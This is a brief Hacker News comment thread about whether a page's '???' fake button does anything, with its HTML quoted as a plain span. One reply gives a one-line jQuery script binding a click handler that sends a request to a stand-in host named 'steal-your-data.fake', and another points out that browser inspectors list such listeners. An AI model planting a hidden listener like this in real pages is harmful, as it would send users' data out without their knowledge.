Hacker News new | ask | show | jobs
by ealhad 2968 days ago
Nothing. Here's its code:

  <span class="fake-button" style="padding: 0px 6px;">???</span>
2 comments

That mean nothing. You could still do:

<script>$('.fake-button').on('click', function(){$.ajax({url: 'http://www.steal-your-data.fake'})})</script>

The inspector displays the listeners of the elements.
Sure about that? ;)